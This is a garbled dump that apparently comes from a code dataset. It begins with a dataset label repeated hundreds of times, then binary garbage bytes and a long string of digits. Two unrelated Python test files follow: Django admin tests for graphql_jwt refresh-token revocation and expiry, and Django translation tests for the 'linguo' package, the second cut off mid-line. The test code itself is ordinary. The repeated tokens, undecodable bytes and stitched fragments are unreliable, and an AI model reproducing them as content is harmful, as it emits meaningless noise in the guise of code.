PythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPython����  ��'   �@    "��'��'��' ��'�*@@@'/5;BIPX_fns{������������������ !(/6=CKSZahou{������������������ &-3:AIPW^fmt|������������������ ")18@GNU\cjqx������������������$+29>ELS[bipw}����������������� %,3:AHOV]cjqy������������������ #*18?FMT[cjqx������������������ #*19@GNU\cjqy������������������  '.4;BIPW^elsz�������������������    % , 3 : A F M U ] d k r y � � � � � � � � � � � � � � � � � �      & , 4 ; B I Q X ` f m t { � � � � � � � � � � � � � � � � � �     " ) 1 8 ? F M T \ c j q x  � � � � � � � � � � � � � � � � � �    " ) 1 9 @ F M U \ c i p x  � � � � � � � � � � � � � � � � �     ' . 4 < D K S Z b j q x  � � � � � � � � � � � � � � � � �   (/6=DKRY`gnu|������������������ !(/6=EMT[cjqx������������������ 1107118710836152678041512833135108300411064345548704455750910501059709110701197111538795447335928576651153446488027108754628361990833810034638144982640828831063284610840272547501211357039304907512813969868774110763047210074761886562261389111868946847437117476071037045174495711943222875455163848328526771543504906366642864812719648118179622363545108169810647248115699454828862147422079171353906035231572536980177392197053441992322066645244551607901618016310757210692521289791221798281257452244385161059666315921101227455462855821046702189045724196905850685633054152897919195952127242625924219308880911060031032988835651004489676110278712774846308128832203065376338845579415515837973912440746238469435284042789370103170977414053115954941070615978095245425907117541561054687340608812820218125160213172657148397410181565465414710365669667985431093314002606635630814815108986530634176064106901253889441396431037295292196801013096159354841245856670323203565292803649111734605103582944653941271178998257762270155976830289240997234429232145121039591542692819348156748291333559937241396494538252999517239102720922281278247092558939220223518914368419024962751233434297523122886877129553471431831075137980875229499063121911571075825649361541250207596396125753983389700212012284580560010789023885749012692047184698768630410827563689105543779166151631795289806733850209903217314979461869504482987667295739124364141228978338034165980332231120332146354980414923511015335569877800207947746212295274942263328216154349957146101608991730451104692342898763127649467343386467124806821397381441306122631037100461935998542094805288807144263116749366114809612828553445358941948717528208110913001178434834476210774971613472284461673915771061802120470512529301543483649746425859367791638437030855243251220406939987754462220476694022347491032930629662229032541606301310805315895875178999561623092582719965864375388010137949634295471157140497148721077482812582861127439287628244006063109827937984281213774298704047661564635015282840711252377666480838299259117482351070701949679344394807740808947082307660646474793896159878554958385623246742696190151845003695791857690758947735242737692423023585809742846960831222984991551397296936215138473849116096810193636551035880001885327058608531747909755783659644441104882119908561944881148504720502036219867564712025748347279061147347436897079043360908708286101377029812671587117637273414500679795122147297113386692343342161204127313805555026983928823087101336312617974507177222129010807103592295712549597180190349564151059799741096516904986961813481669031244231812249836946056713058838520151224899983769594582304647933111081276828579210361833475999839602635805947362698529728129482954747650438230624781192553816804789710960786943715686758081095874417250125727110478581030276219135799680582516250820328266212419607475035666744689150709201314408112373452498980828508727455012762043149324712290068955661363509374912050346591521716874686651236655371307303081741756909842230253342227106285723254633678270444112539737929274487284534211191029993488236056735038987116829937881553940730588051834350138174659211628942100147746280529647038275052912247296626682171697136125965417628126575139985926482248424397208477613363763113741121081271260061071032947111850006122145147376581333351041041369096229303817110203591280882654123317764282120286916347383563537912611658608219881205410340465102537303070676122693291165686126218581033771436032812352489631351971506111117634912489599120277021059207724326541339564431592544998224543316998039561536331102931248614324777057102130228827786121394866454442418434034839961539023125233493089222333909411765005712600527664476181017234955907694657307412695995384942266723395805641147877139616055568205169492095296538672186193870661871089997361126906512894771039569618014441259031112417446421506219700941269114763565333475869865215137508634459784846654923678955511175128268361152889522324099161760123432503944183347271313326636342252124221051146113756791893053605248722060151114273586478245895833100683521666673228925426692309063626418199417385579217274043957821836811733534��O����������[�+\-[2}6=�L�V�Z a$y3�צ�������1�&����!�T2�٣������? C�4`6�:y?7F�H�]�s@z���J  �#�%�(�:6HhM ���+�q���+X�N�X[=^�c`h�w۩6�R�+�������w�������� T ��$b%�%�.�/�1�A����x�! ��H�Q�bf��̚ћ-�<�w� �Y�Y�IR&�4 K6 �� q� �� � _� �� *� d� �� � � �  � 3 & �' �� ɿ � }� �� -� �� � u � ^, �0 _2 �2 �; �A )K �N u\ g &� ߖ I� I� � 8 l= FG � #� w� ݳ �< �K BU WX 0a �g _h Ɠ �� ݷ &� �� � �=�F$�$�7CA�B]�`wk]s��~�x�2���$�'�,�Om`�e�g�m�n�o~U~�� �H� ����^�����8�(c+D.�6�\��·��Q�[���"l)G*�=�l�n!r�����15�8C,G{O�P�W;[�|�}c���(�#�7�������@ A�A2I�������[������v����I�B�����������m����5�-2�>WC>D�Y;]�]�ws�Ҏ����Y����x e�3=�(h<����g�u���, Q��69�:�@F�F�_:s@�B�x�������s���\�#�"�*�-�8�Sc[fԓ��Ƶ|�s���,������V�`[ckk�yz�}'�����I�y�;��1�������T���8�������:�Sm�t�|���ϥE�j�V���#�*���x�"���` ��$�*�0{`�g�j^k�k�r�t�w����ޅ��U���A���ڴ��������}��5N�#�$P(�6L���'� ��p��#A�W�� ������ � ] �3 @ /B �J �c �n |x �y F� ɽ �� �� '!E!�!�#!E>![�!e�!��!)�!k�!��!��!B�!�*"*2"�4"�5".6"N9"�;"�M"�U"�["�s"(u"�v"��"�"2�"M�"��"%�"��"��"�#�#�#-#�#G#��#�#��#T�#�#;�#��#��#�#��#x�#��#�$4'$�8$+;$�D$�P$�i$[j$�j$�$ �$��$��$c�$S�$w�$a�$1�$�%�%?%o�%Ń%A�%!�%3�%_�%�%�& &� &70&�T&�Y&�f&�r&C�&��&^�&v ' '^'j'M_'�e'��'��'a�'9�'J�'Y�'��'tests/refresh_token/test_admin.py from django.contrib.admin import site from graphql_jwt.refresh_token import admin from graphql_jwt.refresh_token.utils import get_refresh_token_model from graphql_jwt.shortcuts import create_refresh_token from ..decorators import skipif_django_version from ..testcases import TestCase class AdminTestCase(TestCase): def setUp(self): super(AdminTestCase, self).setUp() RefreshToken = get_refresh_token_model() self.refresh_token = create_refresh_token(self.user) self.refresh_token_admin = admin.RefreshTokenAdmin(RefreshToken, site) class AdminTests(AdminTestCase): def test_revoke(self): request = self.request_factory.get('/') qs = self.refresh_token_admin.get_queryset(request) self.refresh_token_admin.revoke(request, qs) self.refresh_token.refresh_from_db() self.assertIsNotNone(self.refresh_token.revoked) def test_is_expired(self): is_expired = self.refresh_token_admin.is_expired(self.refresh_token) self.assertFalse(is_expired) class FiltersTests(AdminTestCase): def filter_queryset(self, **kwargs): request = self.request_factory.get('/', kwargs) request.user = self.user changelist = self.refresh_token_admin.get_changelist_instance(request) return changelist.get_queryset(request) @skipif_django_version('2.0') def test_revoked(self): qs = self.filter_queryset(revoked='yes') self.assertFalse(qs) @skipif_django_version('2.0') def test_not_revoked(self): qs = self.filter_queryset(revoked='no') self.assertTrue(qs) @skipif_django_version('2.0') def test_expired(self): qs = self.filter_queryset(expired='yes') self.assertFalse(qs) @skipif_django_version('2.0') def test_not_expired(self): qs = self.filter_queryset(expired='no') self.assertTrue(qs) 10-100 # coding=utf-8 import django from django.contrib.auth.models import User from django.core.urlresolvers import reverse from django.db import IntegrityError from django.test import TestCase from django.utils import translation from linguo.tests.forms import BarForm, BarFormWithFieldsSpecified, \ BarFormWithFieldsExcluded, MultilingualBarFormAllFields from linguo.tests.models import Foo, FooRel, Moo, Bar, BarRel, Moe, Gem, \ FooCategory, Hop, Ord, Doc, Lan class LinguoTests(TestCase): def setUp(self): self.old_lang = translation.get_language() translation.activate('en') def tearDown(self): translation.activate(self.old_lang) class Tests(LinguoTests): def testOrderingOfFieldsWithinModel(self): expected = ['id', 'price', 'name', 'name_fr'] for i in range(len(Foo._meta.fields)): self.assertEqual(Foo._meta.fields[i].name, expected[i]) def testCreation(self): translation.activate('en') obj = Foo.objects.create(name='Foo', price=10) obj = Foo.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') Foo.objects.create(name='FrenchName', price=15) translation.activate('en') self.assertEquals(Foo.objects.count(), 2) def testTranslate(self): """ We should be able to translate fields on the object. """ obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(Foo.objects.count(), 1) def testDelayedCreation(self): obj = Foo() obj.name = 'Foo' obj.price = 10 translation.activate('fr') obj.name = 'FooFr' obj.save() translation.activate('en') obj = Foo.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 10) def testMultipleTransFields(self): obj = Hop.objects.create(name='hop', description='desc', price=11) obj.translate(name='hop_fr', description='desc_fr', language='fr') self.assertEquals(obj.name, 'hop') self.assertEquals(obj.description, 'desc') self.assertEquals(obj.price, 11) translation.activate('fr') self.assertEquals(obj.name, 'hop_fr') self.assertEquals(obj.description, 'desc_fr') self.assertEquals(obj.price, 11) def testMultipleTransFieldsButNotSettingOneDuringCreation(self): obj = Hop.objects.create(name='hop', price=11) self.assertEquals(obj.name, 'hop') self.assertEquals(obj.price, 11) def testSwitchingActiveLanguageSetsValuesOnTranslatedFields(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') obj.name = 'NewFooFr' translation.activate('en') self.assertEquals(obj.name, 'Foo') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Foo') translation.activate('fr') self.assertEquals(obj.name, 'NewFooFr') def testCreateTranslationWithNewValueForNonTransField(self): """ That value of non-trans fields should be the same for all translations. """ obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', price=20, language='fr') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 20) translation.activate('en') self.assertEquals(obj.price, 20) # Ensure no other fields were changed self.assertEquals(obj.name, 'Foo') def testQuerysetUpdate(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() obj2 = Foo.objects.create(name='Foo2', price=13) obj2.translate(name='Foo2Fr', language='fr') obj2.save() qs = Foo.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewFoo') # Refresh objects from db obj = Foo.objects.get(pk=obj.pk) obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj.price, 10) self.assertEquals(obj.name, 'NewFoo') self.assertEquals(obj2.price, 13) self.assertEquals(obj2.name, 'NewFoo') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 10) self.assertEquals(obj2.name, 'Foo2Fr') self.assertEquals(obj2.price, 13) def testQuerysetUpdateInOtherLanguageSetsValuesOnOtherLanguageOnly(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() obj2 = Foo.objects.create(name='Foo2', price=13) obj2.translate(name='Foo2Fr', language='fr') obj2.save() translation.activate('fr') qs = Foo.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewFooFr') # Refresh objects from db obj = Foo.objects.get(pk=obj.pk) obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj.price, 10) self.assertEquals(obj.name, 'NewFooFr') self.assertEquals(obj2.price, 13) self.assertEquals(obj2.name, 'NewFooFr') translation.activate('en') self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) self.assertEquals(obj2.name, 'Foo2') self.assertEquals(obj2.price, 13) def testUniqueTogetherUsingTransFields(self): Foo.objects.create(name='Foo', price=10) try: # name, price are unique together Foo.objects.create(name='Foo', price=10) except IntegrityError: pass else: self.fail() def testFilteringOnTransField(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() qs = Foo.objects.filter(name="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name__startswith="English") self.assertEquals(qs.count(), 0) translation.activate('fr') qs = Foo.objects.filter(name="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name__startswith="French") self.assertEquals(qs.count(), 0) def testFilteringUsingExplicitFieldName(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=20) obj2.translate(name='Another French Foo', language='fr') obj2.save() # we're in english qs = Foo.objects.filter(name_en="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # try using the french field name qs = Foo.objects.filter(name_fr="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # now try in french translation.activate('fr') qs = Foo.objects.filter(name_en="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_en__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) # try using the french field name qs = Foo.objects.filter(name_fr="French Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.exclude(name_fr__startswith="French") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj2) def testOrderingOnTransField(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() qs = Foo.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) translation.activate('fr') qs = Foo.objects.order_by('name') self.assertEquals(qs.count(), 2) self.assertEquals(qs[0], obj2) self.assertEquals(qs[1], obj) self.assertEquals(qs[1].name, 'French Foo') def testDefaultOrderingIsTransField(self): """ Test a model that has a trans field in the default ordering. """ f1 = FooCategory.objects.create(name='B2 foo') f1.translate(name='B2 foo', language='fr') f1.save() f2 = FooCategory.objects.create(name='A1 foo') f2.translate(name='C3 foo', language='fr') f2.save() f3 = FooCategory.objects.create(name='C3 foo') f3.translate(name='A1 foo', language='fr') f3.save() qs_en = FooCategory.objects.all() self.assertEquals(qs_en[0], f2) self.assertEquals(qs_en[1], f1) self.assertEquals(qs_en[2], f3) translation.activate('fr') qs_fr = FooCategory.objects.all() self.assertEquals(qs_fr[0], f3) self.assertEquals(qs_fr[1], f1) self.assertEquals(qs_fr[2], f2) def testFilteringOnRelatedObjectsTransField(self): # Test filtering on related object's translatable field obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=12) obj2.translate(name='Another French Foo', language='fr') obj2.save() m1 = FooRel.objects.create(myfoo=obj, desc="description 1") m2 = FooRel.objects.create(myfoo=obj2, desc="description 2") qs = FooRel.objects.filter(myfoo__name='Another English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = FooRel.objects.filter(myfoo__name__startswith='English') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) translation.activate('fr') qs = FooRel.objects.filter(myfoo__name='Another French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) qs = FooRel.objects.filter(myfoo__name__startswith='French') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) def testFilteringOnRelatedObjectsUsingExplicitFieldName(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() obj2 = Foo.objects.create(name='Another English Foo', price=20) obj2.translate(name='Another French Foo', language='fr') obj2.save() m1 = FooRel.objects.create(myfoo=obj, desc="description 1") m2 = FooRel.objects.create(myfoo=obj2, desc="description 2") # we're in english translation.activate('en') qs = FooRel.objects.filter(myfoo__name_en='English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_en__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # try using the french field name qs = FooRel.objects.filter(myfoo__name_fr='French Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_fr__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # now try in french translation.activate('fr') qs = FooRel.objects.filter(myfoo__name_en='English Foo') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m1) qs = FooRel.objects.filter(myfoo__name_en__startswith='Another') self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], m2) # try using the french field name qs = 